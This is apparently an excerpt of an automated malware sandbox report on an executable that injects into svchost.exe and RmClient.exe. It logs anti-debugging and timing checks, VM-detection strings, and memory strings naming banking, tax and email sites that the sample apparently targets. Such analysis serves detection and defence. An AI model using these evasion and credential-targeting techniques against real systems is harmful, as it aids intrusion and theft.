                Source: 40182GJpK.6.drBinary or memory string: outlook.office.comVMware20,11696487552s
                Source: 40182GJpK.6.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                Source: 40182GJpK.6.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                Source: 40182GJpK.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                Source: RmClient.exe, 00000006.00000002.4010464904.000000000276D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllA
                Source: 40182GJpK.6.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                Source: 40182GJpK.6.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\RmClient.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0387096E rdtsc 2_2_0387096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417263 LdrLoadDll,2_2_00417263
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_00533F09 BlockInput,0_2_00533F09
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004C3B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_004C3B3A
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004F5A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_004F5A7C
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_004C4B37 LoadLibraryA,GetProcAddress,0_2_004C4B37
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_01109310 mov eax, dword ptr fs:[00000030h]0_2_01109310
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_01109370 mov eax, dword ptr fs:[00000030h]0_2_01109370
                Source: C:\Users\user\Desktop\9MZZG92yMO.exeCode function: 0_2_01107CE0 mov eax, dword ptr fs:[00000030h]0_2_01107CE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382E388 mov eax, dword ptr fs:[00000030h]2_2_0382E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385438F mov eax, dword ptr fs:[00000030h]2_2_0385438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03828397 mov eax, dword ptr fs:[00000030h]2_2_03828397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC3CD mov eax, dword ptr fs:[00000030h]2_2_038EC3CD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A3C0 mov eax, dword ptr fs:[00000030h]2_2_0383A3C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038383C0 mov eax, dword ptr fs:[00000030h]2_2_038383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B63C0 mov eax, dword ptr fs:[00000030h]2_2_038B63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov ecx, dword ptr fs:[00000030h]2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE3DB mov eax, dword ptr fs:[00000030h]2_2_038DE3DB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D43D4 mov eax, dword ptr fs:[00000030h]2_2_038D43D4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038403E9 mov eax, dword ptr fs:[00000030h]2_2_038403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E3F0 mov eax, dword ptr fs:[00000030h]2_2_0384E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038663FF mov eax, dword ptr fs:[00000030h]2_2_038663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386A30B mov eax, dword ptr fs:[00000030h]2_2_0386A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C310 mov ecx, dword ptr fs:[00000030h]2_2_0382C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03850310 mov ecx, dword ptr fs:[00000030h]2_2_03850310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov ecx, dword ptr fs:[00000030h]2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03908324 mov eax, dword ptr fs:[00000030h]2_2_03908324
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B2349 mov eax, dword ptr fs:[00000030h]2_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov ecx, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B035C mov eax, dword ptr fs:[00000030h]2_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038FA352 mov eax, dword ptr fs:[00000030h]2_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D8350 mov ecx, dword ptr fs:[00000030h]2_2_038D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390634F mov eax, dword ptr fs:[00000030h]2_2_0390634F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D437C mov eax, dword ptr fs:[00000030h]2_2_038D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0386E284 mov eax, dword ptr fs:[00000030h]2_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B0283 mov eax, dword ptr fs:[00000030h]2_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov ecx, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C62A0 mov eax, dword ptr fs:[00000030h]2_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383A2C3 mov eax, dword ptr fs:[00000030h]2_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039062D6 mov eax, dword ptr fs:[00000030h]2_2_039062D6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038402E1 mov eax, dword ptr fs:[00000030h]2_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382823B mov eax, dword ptr fs:[00000030h]2_2_0382823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov eax, dword ptr fs:[00000030h]2_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B8243 mov ecx, dword ptr fs:[00000030h]2_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0390625D mov eax, dword ptr fs:[00000030h]2_2_0390625D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A250 mov eax, dword ptr fs:[00000030h]2_2_0382A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836259 mov eax, dword ptr fs:[00000030h]2_2_03836259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]2_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EA250 mov eax, dword ptr fs:[00000030h]2_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03834260 mov eax, dword ptr fs:[00000030h]2_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382826B mov eax, dword ptr fs:[00000030h]2_2_0382826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E0274 mov eax, dword ptr fs:[00000030h]2_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03870185 mov eax, dword ptr fs:[00000030h]2_2_03870185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038EC188 mov eax, dword ptr fs:[00000030h]2_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D4180 mov eax, dword ptr fs:[00000030h]2_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B019F mov eax, dword ptr fs:[00000030h]2_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A197 mov eax, dword ptr fs:[00000030h]2_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F61C3 mov eax, dword ptr fs:[00000030h]2_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038AE1D0 mov eax, dword ptr fs:[00000030h]2_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039061E5 mov eax, dword ptr fs:[00000030h]2_2_039061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038601F8 mov eax, dword ptr fs:[00000030h]2_2_038601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov eax, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DE10E mov ecx, dword ptr fs:[00000030h]2_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov ecx, dword ptr fs:[00000030h]2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038DA118 mov eax, dword ptr fs:[00000030h]2_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F0115 mov eax, dword ptr fs:[00000030h]2_2_038F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03860124 mov eax, dword ptr fs:[00000030h]2_2_03860124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov ecx, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C4144 mov eax, dword ptr fs:[00000030h]2_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C156 mov eax, dword ptr fs:[00000030h]2_2_0382C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C8158 mov eax, dword ptr fs:[00000030h]2_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03836154 mov eax, dword ptr fs:[00000030h]2_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]2_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03904164 mov eax, dword ptr fs:[00000030h]2_2_03904164
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383208A mov eax, dword ptr fs:[00000030h]2_2_0383208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038280A0 mov eax, dword ptr fs:[00000030h]2_2_038280A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C80A8 mov eax, dword ptr fs:[00000030h]2_2_038C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov eax, dword ptr fs:[00000030h]2_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038F60B8 mov ecx, dword ptr fs:[00000030h]2_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B20DE mov eax, dword ptr fs:[00000030h]2_2_038B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0382A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038380E9 mov eax, dword ptr fs:[00000030h]2_2_038380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B60E0 mov eax, dword ptr fs:[00000030h]2_2_038B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C0F0 mov eax, dword ptr fs:[00000030h]2_2_0382C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038720F0 mov ecx, dword ptr fs:[00000030h]2_2_038720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B4000 mov ecx, dword ptr fs:[00000030h]2_2_038B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D2000 mov eax, dword ptr fs:[00000030h]2_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0384E016 mov eax, dword ptr fs:[00000030h]2_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382A020 mov eax, dword ptr fs:[00000030h]2_2_0382A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0382C020 mov eax, dword ptr fs:[00000030h]2_2_0382C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038C6030 mov eax, dword ptr fs:[00000030h]2_2_038C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03832050 mov eax, dword ptr fs:[00000030h]2_2_03832050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B6050 mov eax, dword ptr fs:[00000030h]2_2_038B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0385C073 mov eax, dword ptr fs:[00000030h]2_2_0385C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038D678E mov eax, dword ptr fs:[00000030h]2_2_038D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038307AF mov eax, dword ptr fs:[00000030h]2_2_038307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038E47A0 mov eax, dword ptr fs:[00000030h]2_2_038E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0383C7C0 mov eax, dword ptr fs:[00000030h]2_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038B07C3 mov eax, dword ptr fs:[00000030h]2_2_038B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038527ED mov eax, dword ptr fs:[00000030h]2_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038BE7E1 mov eax, dword ptr fs:[00000030h]2_2_038BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_038347FB mov eax, dword ptr fs:[00000030h]2_2_038347FB
